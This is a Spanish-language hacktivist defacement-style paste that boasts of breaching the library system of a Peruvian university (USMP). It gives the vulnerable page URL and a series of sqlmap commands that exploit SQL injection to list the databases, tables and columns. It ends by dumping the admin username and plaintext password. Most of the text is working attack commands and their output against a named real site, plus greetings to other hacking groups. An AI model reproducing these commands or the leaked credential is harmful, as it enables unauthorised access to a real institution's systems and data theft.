|| Government Of Perú | Sistema de Bibliotecas USMP || ownd

1. Hola, hace tiempo había leído que esta Universidad era una de las mejores de Perú, pero sin embargo no lo es, aunque no lo crean tiene las mismas vulnerabilidades que tienen todas las Universidades de Perú, la cual permite obtener toda su base de datos con un simple bug...
2.  
3. Bueno, sin mas que decir...
4.  
5. ___________ .__.__
6. \_ _____/____ |__| |
7. | __) \__ \ | | |
8. | \ / __ \| | |__
9. \___ / (____ /__|____/
10. \/ \/
11. _________ .__ __
12. / _____/ ____ ____ __ _________|__|/ |_ ___.__.
13. \_____ \_/ __ \_/ ___\| | \_ __ \ \ __< | |
14. / \ ___/\ \___| | /| | \/ || | \___ |
15. /_______ /\___ >\___ >____/ |__| |__||__| / ____|
16. \/ \/ \/ \/
17. ___________
18. \__ ___/___ _____ _____
19. | |_/ __ \\__ \ / \
20. | |\ ___/ / __ \| Y Y \
21. |____| \___ >____ /__|_| /
22. \/ \/ \/
23.  
24. ==========================================================
25.  
26. HACKED :P
27.  
28. || Government Of Perú | Sistema de Bibliotecas USMP ||
29.  
30. #ANTISEC
31.  
32. Integrantes: @Zer0P4nik @D3str0yers @McST0NE @DeLaGhezzy90 @MaDx404 @_h4v0k
33.  
34. ===========================================================
35.  
36. Sitio Web: http://www.sibus.usmp.edu.pe
37. Link Vulnerable: http://www.sibus.usmp.edu.pe/servicio.php?cat=1
38. Vulnerabilidad: SQL Injection
39.  
40. Base de datos desde el SLQMAP:
41.  
42. ./sqlmap.py -u http://www.sibus.usmp.edu.pe/servicio.php?cat=1 --dbs
43.  
44. available databases [4]:
45.  
46. [*] biblioteca
47. [*] information_schema
48. [*] mysql
49. [*] test
50.  
51. ./sqlmap.py -u http://www.sibus.usmp.edu.pe/servicio.php?cat=1 -D biblioteca --tables
52.  
53. Database: biblioteca
54. [28 tables]
55. +-----------------------+
56. | adq_categoria |
57. | adquisicion |
58. | biblioteca_virtual |
59. | carne |
60. | directorio |
61. | docente_inscripcion |
62. | ebsco_inscripcion |
63. | egresado_inscripcion |
64. | enlace |
65. | galeria |
66. | galeria_fotos |
67. | guia_manual |
68. | imagen |
69. | info_general |
70. | infonauta |
71. | logo |
72. | martino |
73. | novedad |
74. | personal |
75. | personal_foto |
76. | publicaciones |
77. | reglamento |
78. | revista |
79. | revista_numero |
80. | servicio |
81. | temporada |
82. | usuario |
83. | visitante_inscripcion |
84. +-----------------------+
85.  
86. ./sqlmap.py -u http://www.sibus.usmp.edu.pe/servicio.php?cat=1 -D biblioteca -T usuario --columns
87.  
88. Database: biblioteca
89. Table: usuario
90. [2 columns]
91. +----------+-------------+
92. | Column | Type |
93. +----------+-------------+
94. | login | varchar(50) |
95. | password | varchar(50) |
96. +----------+-------------+
97.  
98. ./sqlmap.py -u http://www.sibus.usmp.edu.pe/servicio.php?cat=1 -D biblioteca -T usuario -C login,password --dump
99.  
100. Database: biblioteca
101. Table: usuario
102. [1 entry]
103. +-------+----------------+
104. | login | password |
105. +-------+----------------+
106. | admin | u5mpb1bl10tec@ |
107. +-------+----------------+
108.  
109. Al parecer no es la mejor que digamos :)
110.  
111. Un saludo a @AnonymousPeru :D
112.  
113. Gr33tz T0: @LegionJJ @Keygen__0x7 @_AlexSw @JJSpartan =D